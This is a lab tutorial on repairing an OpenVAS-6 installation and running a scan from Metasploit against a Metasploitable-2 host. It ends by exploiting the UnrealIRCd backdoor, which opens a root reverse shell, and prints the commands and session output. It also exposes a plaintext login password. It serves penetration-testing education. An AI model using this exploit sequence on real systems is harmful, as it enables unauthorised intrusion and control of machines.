OpenVAS Metasploit

The document describes the steps to check the configuration and functions of OpenVAS. It runs the openvas-check-setup command and reports the results of each step, including checking that the OpenVAS scanner, manager, administrator, GSA, CLI and GSD services are present and running correctly. It finds some warnings around signature checking, password policies and unsupported nmap versions.

http://di.konfigurasi.in
OpenVAS
Verify that the OpenVAS services are functioning correctly by running the following command:
root@sockalilnx2:~# cd /usr/bin/
root@sockalilnx2:/usr/bin# ./openvas-check-setup
openvas-check-setup 2.2.3
Test completeness and readiness of OpenVAS-6
(add '--v4', '--v5' or '--v7'
if you want to check for another OpenVAS version)
Please report us any non-detected problems and
help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss
Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem.
Use the parameter --server to skip checks for client tools
like GSD and OpenVAS-CLI.
Step 1: Checking OpenVAS Scanner ...
OK: OpenVAS Scanner is present in version 3.4.0.
OK: OpenVAS Scanner CA Certificate is present as /var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /var/lib/openvas/plugins contains 36066 NVTs.
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner.
SUGGEST: Enable signature checking (see http://www.openvas.org/trusted-nvts.html).
OK: The NVT cache in /var/cache/openvas contains 36066 files for 36066 NVTs.
Step 2: Checking OpenVAS Manager ...
OK: OpenVAS Manager is present in version 4.0.4.
OK: OpenVAS Manager client certificate is present as /var/lib/openvas/CA/clientcert.pem.
OK: OpenVAS Manager database found in /var/lib/openvas/mgr/tasks.db.
OK: Access rights for the OpenVAS Manager database are correct.
OK: sqlite3 found, extended checks of the OpenVAS Manager installation enabled.
OK: OpenVAS Manager database is at revision 74.
OK: OpenVAS Manager expects database at revision 74.
OK: Database schema is up to date.
OK: OpenVAS Manager database contains information about 36064 NVTs.
OK: OpenVAS SCAP database found in /var/lib/openvas/scap-data/scap.db.
OK: OpenVAS CERT database found in /var/lib/openvas/cert-data/cert.db.
OK: xsltproc found.
Step 3: Checking OpenVAS Administrator ...
OK: OpenVAS Administrator is present in version 1.3.2.
OK: At least one user exists.
OK: At least one admin user exists.
WARNING: Your password policy is empty.
SUGGEST: Edit the /etc/openvas/pwpolicy.conf file to set a password policy.

Step 4: Checking Greenbone Security Assistant (GSA) ...
OK: Greenbone Security Assistant is present in version 4.0.0.
Step 5: Checking OpenVAS CLI ...
OK: OpenVAS CLI version 1.2.0.
Step 6: Checking Greenbone Security Desktop (GSD) ...
OK: Greenbone Security Desktop is present in Version 1.2.2.
Step 7: Checking if OpenVAS services are up and running ...
OK: netstat found, extended checks of the OpenVAS services enabled.
OK: OpenVAS Scanner is running and listening on all interfaces.
OK: OpenVAS Scanner is listening on port 9391, which is the default port.
WARNING: OpenVAS Manager is running and listening only on the local interface. This means
that you will not be able to access the OpenVAS Manager from the outside using GSD or OpenVAS
CLI.
SUGGEST: Ensure that OpenVAS Manager listens on all interfaces.
OK: OpenVAS Manager is listening on port 9390, which is the default port.
OK: OpenVAS Administrator is running and listening only on the local interface.
OK: OpenVAS Administrator is listening on port 9393, which is the default port.
OK: Greenbone Security Assistant is listening on port 9392, which is the default port.
Step 8: Checking nmap installation ...
WARNING: Your version of nmap is not fully supported: 6.46
SUGGEST: You should install nmap 5.51.
Step 9: Checking presence of optional tools ...
OK: pdflatex found.
OK: PDF generation successful. The PDF report format is likely to work.
OK: ssh-keygen found, LSC credential generation for GNU/Linux targets is likely to work.
WARNING: Could not find rpm binary, LSC credential package generation for RPM and DEB
based targets will not work.
SUGGEST: Install rpm.
WARNING: Could not find makensis binary, LSC credential package generation for Microsoft
Windows targets will not work.
SUGGEST: Install nsis.
It seems like your OpenVAS-6 installation is OK.
If you think it is not OK, please report your observation
and help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss
Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem.

If the OpenVAS check reports a status like the following:


root@sockalilnx2:/usr/bin# ./openvas-check-setup
openvas-check-setup 2.2.3

Test completeness and readiness of OpenVAS-6
(add '--v4', '--v5' or '--v7'
if you want to check for another OpenVAS version)
Please report us any non-detected problems and
help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss
Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem.
Use the parameter --server to skip checks for client tools
like GSD and OpenVAS-CLI.
Step 1: Checking OpenVAS Scanner ...
OK: OpenVAS Scanner is present in version 3.4.0.
OK: OpenVAS Scanner CA Certificate is present as /var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /var/lib/openvas/plugins contains 36066 NVTs.
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner.
SUGGEST: Enable signature checking (see http://www.openvas.org/trusted-nvts.html).
OK: The NVT cache in /var/cache/openvas contains 36066 files for 36066 NVTs.
Step 2: Checking OpenVAS Manager ...
OK: OpenVAS Manager is present in version 4.0.4.
OK: OpenVAS Manager client certificate is present as /var/lib/openvas/CA/clientcert.pem.
OK: OpenVAS Manager database found in /var/lib/openvas/mgr/tasks.db.
OK: Access rights for the OpenVAS Manager database are correct.
OK: sqlite3 found, extended checks of the OpenVAS Manager installation enabled.
OK: OpenVAS Manager database is at revision 74.
OK: OpenVAS Manager expects database at revision 74.
OK: Database schema is up to date.
OK: OpenVAS Manager database contains information about 36064 NVTs.
OK: OpenVAS SCAP database found in /var/lib/openvas/scap-data/scap.db.
OK: OpenVAS CERT database found in /var/lib/openvas/cert-data/cert.db.
OK: xsltproc found.
Step 3: Checking OpenVAS Administrator ...
OK: OpenVAS Administrator is present in version 1.3.2.
OK: At least one user exists.
OK: At least one admin user exists.
WARNING: Your password policy is empty.
SUGGEST: Edit the /etc/openvas/pwpolicy.conf file to set a password policy.
Step 4: Checking Greenbone Security Assistant (GSA) ...
OK: Greenbone Security Assistant is present in version 4.0.0.
Step 5: Checking OpenVAS CLI ...
OK: OpenVAS CLI version 1.2.0.
Step 6: Checking Greenbone Security Desktop (GSD) ...
OK: Greenbone Security Desktop is present in Version 1.2.2.
Step 7: Checking if OpenVAS services are up and running ...
OK: netstat found, extended checks of the OpenVAS services enabled.

ERROR: OpenVAS Scanner is NOT running!
FIX: Start OpenVAS Scanner (openvassd).
OK: OpenVAS Manager is running and listening on all interfaces.
OK: OpenVAS Manager is listening on port 9390, which is the default port.
ERROR: OpenVAS Administrator is NOT running!
FIX: Start OpenVAS Administrator (openvasad).
ERROR: Greenbone Security Assistant is NOT running!
FIX: Start Greenbone Security Assistant (gsad).
ERROR: Your OpenVAS-6 installation is not yet complete!
Please follow the instructions marked with FIX above and run this
script again.
If you think this result is wrong, please report your observation
and help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss
Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem.
Check which ports are still in use by openvas and gsad.
root@sockalilnx2:/usr/bin# netstat -nlpt | grep openvas
root@sockalilnx2:/usr/bin# netstat -nlpt | grep gsad
If no ports are in use, you can run the commands below:
root@sockalilnx2:/usr/bin# openvasmd -p 9390 -a 127.0.0.1
root@sockalilnx2:/usr/bin# openvasad -a 127.0.0.1 -p 9393
root@sockalilnx2:/usr/bin# gsad --http-only --listen=10.10.9.169 -p 9392
If a port is already in use, for example:
tcp        0      0 127.0.0.1:9390          0.0.0.0:*               LISTEN      1725/openvasmd
you can first kill the process holding it with the command kill -9 1725
Start the openvassd service and wait until All plugins loaded appears; this takes quite a while.
root@sockalilnx2:/usr/bin# openvassd
All plugins loaded
Start the openvasmd service
root@sockalilnx2:/usr/bin# openvasmd
Check the ports we set up earlier with the commands below:
root@sockalilnx2:/usr/bin# netstat -nlpt | grep openvas
tcp        0      0 127.0.0.1:9390          0.0.0.0:*               LISTEN      1725/openvasmd
tcp        0      0 0.0.0.0:9391            0.0.0.0:*               LISTEN      639/openvassd: wait
tcp        0      0 0.0.0.0:9393            0.0.0.0:*               LISTEN      1273/openvasad

root@sockalilnx2:/usr/bin# netstat -nlpt | grep gsad
tcp        0      0 10.10.9.169:9392        0.0.0.0:*               LISTEN      610/gsad

Run the OpenVAS setup check again:
root@sockalilnx2:/usr/bin# ./openvas-check-setup
Make sure that Step 1 through Step 9 all pass and that the output includes the message: It seems like your OpenVAS-6 installation is OK.
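The port check used in this procedure can be scripted. The Python script below is an added example, not part of the original tutorial: it reads netstat -nlpt output and reports, for each OpenVAS port, whether the expected daemon is listening, whether another process holds the port, and which interfaces it is bound to. It assumes the default ports and daemon names reported by openvas-check-setup above; the function names and the sample netstat lines are constructed for illustration.

```python
import ipaddress
import re

# Default ports and daemon names as reported by openvas-check-setup on this page.
EXPECTED = {9390: "openvasmd", 9391: "openvassd", 9392: "gsad", 9393: "openvasad"}

# Constructed sample in `netstat -nlpt` format, modelled on the page's output.
# openvasad (9393) is left out on purpose to show the "not running" case.
SAMPLE = """\
tcp        0      0 127.0.0.1:9390      0.0.0.0:*     LISTEN      1725/openvasmd
tcp        0      0 0.0.0.0:9391        0.0.0.0:*     LISTEN      639/openvassd: wait
tcp        0      0 10.10.9.169:9392    0.0.0.0:*     LISTEN      610/gsad
tcp6       0      0 :::22               :::*          LISTEN      412/sshd
"""

# proto recv-q send-q local-addr:port foreign-addr state pid/program[: title]
LINE = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTEN\s+"
    r"(?P<pid>\d+)/(?P<prog>[^\s:]+)"
)


def bind_scope(addr):
    """Classify a listen address: loopback, all-interfaces or single-interface."""
    ip = ipaddress.ip_address(addr)
    if ip.is_unspecified:  # 0.0.0.0 or ::
        return "all-interfaces"
    return "loopback" if ip.is_loopback else "single-interface"


def audit_listeners(netstat_text, expected=EXPECTED):
    """Return {port: (status, detail)} for every expected OpenVAS port."""
    seen = {}
    for line in netstat_text.splitlines():
        m = LINE.match(line.strip())
        if m and int(m["port"]) in expected:
            seen[int(m["port"])] = (m["addr"], int(m["pid"]), m["prog"])
    report = {}
    for port, daemon in sorted(expected.items()):
        if port not in seen:
            report[port] = ("not-listening", f"start {daemon}")
            continue
        addr, pid, prog = seen[port]
        if prog != daemon:
            # Another process holds the port; the daemon cannot bind until it exits.
            report[port] = ("port-conflict", f"pid {pid} ({prog}) holds the port")
        else:
            report[port] = (bind_scope(addr), f"{daemon} pid {pid} on {addr}")
    return report


if __name__ == "__main__":
    for port, (status, detail) in audit_listeners(SAMPLE).items():
        print(f"{port}  {status:<17} {detail}")
```

On a live host, feed it the real output instead of SAMPLE; netstat must run as root, otherwise the PID/program column is empty and every port is reported as not-listening.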
Test access to OpenVAS through a browser to confirm that port 9392 is reachable from the browser at IP 10.10.9.169:

Applications > Kali Linux > Vulnerability Analysis > OpenVAS > openvas-gsd

Test access to OpenVAS through Greenbone Security Desktop to confirm that port 9390 is reachable from openvas-gsd at IP 127.0.0.1:

Logged in as: admin at 127.0.0.1:9390

Metasploit
root@sockalilnx2:/usr/bin# msfconsole

msf > load openvas


[*] Welcome to OpenVAS integration by kost and averagesecurityguy.
[*]
[*] OpenVAS integration requires a database connection. Once the
[*] database is ready, connect to the OpenVAS server using openvas_connect.
[*] For additional commands use openvas_help.
[*]
[*] Successfully loaded plugin: OpenVAS
msf > openvas_connect
[*] Usage:
[*] openvas_connect username password host port <ssl-confirm>
msf > openvas_connect admin indosat2014! 127.0.0.1 9390 ok
[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username admin...
[+] OpenVAS connection successful
msf > openvas_target_create
[*] Usage: openvas_target_create <name> <hosts> <comment>
msf > openvas_target_create Metasploitable-2 10.10.101.14 Scanning
[*] OK, resource created: ed4f1ebf-7b07-420e-8be7-4c940dc940e8
[+] OpenVAS list of targets

ID  Name              Hosts         Max Hosts  In Use  Comment
--  ----              -----         ---------  ------  -------
0   Localhost         localhost     1          0
1   Metasploitable-2  10.10.101.14  1          0       Scanning
msf > openvas_config_list
[+] OpenVAS list of configs
ID  Name
--  ----
0   empty
1   Full and fast
2   Full and fast ultimate
3   Full and very deep
4   Full and very deep ultimate
msf > openvas_task_create
[*] Usage: openvas_task_create <name> <comment> <config_id> <target_id>
msf > openvas_task_create Metasploitable-2 Vulnerability-Scanning 1 1
[*] OK, resource created: 6adfb031-a568-4215-8f9c-72145c17f9b1
[+] OpenVAS list of tasks
ID  Name              Comment                 Status  Progress
--  ----              -------                 ------  --------
0   Metasploitable-2  Vulnerability-Scanning  New     -1
msf > openvas_task_start
[*] Usage: openvas_task_start <id>
msf > openvas_task_start 0
[*] OK, request submitted
msf > openvas_task_list
[+] OpenVAS list of tasks
ID  Name              Comment                 Status   Progress
--  ----              -------                 ------   --------
0   Metasploitable-2  Vulnerability-Scanning  Running  1

Type openvas_task_list again in Metasploit to see the scan status
msf > openvas_task_list
[+] OpenVAS list of tasks
ID  Name              Comment                 Status  Progress
--  ----              -------                 ------  --------
0   Metasploitable-2  Vulnerability-Scanning  Done    -1

msf > openvas_report_list


[+] OpenVAS list of reports
ID  Task Name         Start Time            Stop Time
--  ---------         ----------            ---------
0   Metasploitable-2  2014-09-05T19:15:19Z  2014-09-05T19:42:18Z
msf > openvas_format_list
[+] OpenVAS list of report formats
ID  Name   Extension  Summary
--  ----   ---------  -------
0   ARF    xml        Asset Reporting Format v1.0.0.
1   CPE    csv        Common Product Enumeration CSV table.
2   HTML   html       Single page HTML report.
3   ITG    csv        German "IT-Grundschutz-Kataloge" report.
4   LaTeX  tex        LaTeX source file.
5   NBE    nbe        Legacy OpenVAS report.
6   PDF    pdf        Portable Document Format report.
7   TXT    txt        Plain text report.
8   XML    xml        Raw XML report.

msf > openvas_report_download


[*] Usage: openvas_report_download <report_id> <format_id> <path> <report_name>
msf > openvas_report_download 0 2 /root/Desktop/ Metasploitable-2
[*] Saving report to /root/Desktop/Metasploitable-2
msf >
msf > openvas_report_import 0 8
[*] Importing report to database.
msf >
msf > vulns
[*] Time: 2014-09-05 19:59:00 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.3.4 refs=CVE-2006-7243,CVE-2010-2094,CVE-2010-2950,CVE-2010-3436,CVE-2010-3709,CVE-2010-3710,CVE-2010-3870,CVE-2010-4150,CVE-2010-4156,CVE-2010-4409,CVE-2010-4697,CVE-2010-4698,CVE-2010-4699,CVE-2010-4700,CVE-2011-0753,CVE-2011-0754,CVE-2011-0755,BID-40173,BID-43926,BID-44605,BID-44718,BID-44723,BID-44951,BID-44980,BID-45119,BID-45335,BID-45338,BID-45339,BID-45952,BID-45954,BID-46056,BID-46168
[*] Time: 2014-09-05 19:59:02 UTC Vuln: host=10.10.101.14 name=http TRACE XSS attack refs=CVE-2004-2320,CVE-2003-1567,BID-9506,BID-9561,BID-11604
[*] Time: 2014-09-05 19:59:02 UTC Vuln: host=10.10.101.14 name=NFS export refs=CVE-1999-0554,CVE-1999-0548
[*] Time: 2014-09-05 19:59:02 UTC Vuln: host=10.10.101.14 name=OpenSSL CCS Man in the Middle Security Bypass Vulnerability (STARTTLS Check) refs=CVE-2014-0224,BID-67899
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=X Server refs=CVE-1999-0526
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=/doc directory browsable ? refs=CVE-1999-0678,BID-318
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=awiki Multiple Local File Include Vulnerabilities refs=BID-49187
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.9 refs=CVE-2008-5498,CVE-2009-1271,CVE-2009-1272,BID-33002,BID-33927
[*] Time: 2014-09-05 19:58:55 UTC Vuln: host=10.10.101.14 name=vsftpd Compromised Source Packages Backdoor Vulnerability refs=BID-48539
[*] Time: 2014-09-05 19:58:55 UTC Vuln: host=10.10.101.14 name=distcc Remote Code Execution Vulnerability refs=CVE-2004-2687
[*] Time: 2014-09-05 19:58:55 UTC Vuln: host=10.10.101.14 name=vsftpd Compromised Source Packages Backdoor Vulnerability refs=BID-48539
[*] Time: 2014-09-05 19:58:55 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.7 refs=CVE-2008-2371,CVE-2008-2665,CVE-2008-2666,CVE-2008-2829,CVE-2008-3658,CVE-2008-3659,CVE-2008-3660,CVE-2008-5557,CVE-2008-5624,CVE-2008-5625,CVE-2008-5658,BID-29796,BID-29797,BID-29829,BID-30087,BID-30649,BID-31612,BID-32383,BID-32625,BID-32688,BID-32948
[*] Time: 2014-09-05 19:58:56 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.6 refs=CVE-2007-4850,CVE-2007-6039,CVE-2008-0599,CVE-2008-1384,CVE-2008-2050,CVE-2008-2051,BID-27413,BID-28392,BID-29009
[*] Time: 2014-09-05 19:58:56 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.14 refs=CVE-2007-1581,CVE-2010-0397,CVE-2010-1860,CVE-2010-1862,CVE-2010-1864,CVE-2010-2097,CVE-2010-2100,CVE-2010-2101,CVE-2010-2190,CVE-2010-2191,CVE-2010-2225,CVE-2010-2484,CVE-2010-2531,CVE-2010-3065,BID-38708,BID-40948,BID-41991
[*] Time: 2014-09-05 19:58:57 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.5 refs=CVE-2007-3996,CVE-2007-4782,CVE-2007-4783,CVE-2007-4784,CVE-2007-4825,CVE-2007-4840,CVE-2007-4887,CVE-2007-4889,CVE-2007-5447,CVE-2007-5653,CVE-2007-5898,CVE-2007-5899,CVE-2007-5900,CVE-2008-2107,CVE-2008-2108,CVE-2008-4107,BID-26403
[*] Time: 2014-09-05 19:58:58 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.3.3 refs=CVE-2010-1917,CVE-2010-3062,CVE-2010-3063,CVE-2010-3064,BID-40461
[*] Time: 2014-09-05 19:58:59 UTC Vuln: host=10.10.101.14 name=PHP-CGI-based setups vulnerability when parsing query string parameters from php files. refs=CVE-2012-1823,CVE-2012-2311,CVE-2012-2336,CVE-2012-2335,BID-53388
[*] Time: 2014-09-05 19:59:00 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.11 refs=CVE-2009-3291,CVE-2009-3292,CVE-2009-3293,CVE-2009-3294,CVE-2009-4018,CVE-2009-5016,BID-36449,BID-44889
[*] Time: 2014-09-05 19:59:00 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.3.1 refs=CVE-2009-3557,CVE-2009-3559,CVE-2009-4017,CVE-2010-1128,BID-36554,BID-36555,BID-37079,BID-37138
[*] Time: 2014-09-05 19:59:00 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.8 refs=CVE-2008-5814,CVE-2008-5844,BID-32673
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability refs=CVE-2012-0053,BID-51706
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=Samba 'client/mount.cifs.c' Remote Denial of Service Vulnerability refs=CVE-2010-0547,BID-38326
[*] Time: 2014-09-05 19:59:04 UTC Vuln: host=10.10.101.14 name=openssh-server Forced Command Handling Information Disclosure Vulnerability refs=CVE-2012-0814,BID-51702
[*] Time: 2014-09-05 19:59:04 UTC Vuln: host=10.10.101.14 name=ICMP Timestamp Detection refs=CVE-1999-0524
[*] Time: 2014-09-05 19:59:04 UTC Vuln: host=10.10.101.14 name=Anonymous FTP Checking refs=CVE-1999-0497

msf > search unreal
Matching Modules
================
Name                                        Disclosure Date  Rank       Description
----                                        ---------------  ----       -----------
exploit/linux/games/ut2004_secure           2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Linux)
exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
exploit/windows/games/ut2004_secure         2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Win32)

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor


msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  6667             yes       The target port
Exploit target:
Id  Name
--  ----
0   Automatic Target
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 10.10.101.14
RHOST => 10.10.101.14
msf exploit(unreal_ircd_3281_backdoor) > exploit -j
[*] Exploit running as background job.
[*] Started reverse double handler
msf exploit(unreal_ircd_3281_backdoor) > [*] Connected to 10.10.101.14:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...

[*] Accepted the second client connection...
[*] Command: echo t3FDGGfytnArjDEX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "t3FDGGfytnArjDEX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.9.169:4444 -> 10.10.101.14:49793) at 2014-09-05 16:03:27 -0400
PRESS ENTER
msf exploit(unreal_ircd_3281_backdoor) > sessions -l
Active sessions
===============
Id  Type        Information  Connection
--  ----        -----------  ----------
1   shell unix               10.10.9.169:4444 -> 10.10.101.14:49793 (10.10.101.14)
msf exploit(unreal_ircd_3281_backdoor) > sessions -i 1
[*] Starting interaction with 1...
pwd
/etc/unreal
cd /home
ls
ftp
msfadmin
pilou
service
user
whoami
root
ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0c:29:e2:2b:c0
inet addr:10.10.101.14 Bcast:10.10.101.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fee2:2bc0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:114561616 errors:57 dropped:404 overruns:0 frame:0
TX packets:5022645 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3265641210 (3.0 GB) TX bytes:3581906147 (3.3 GB)
Interrupt:19 Base address:0x2000
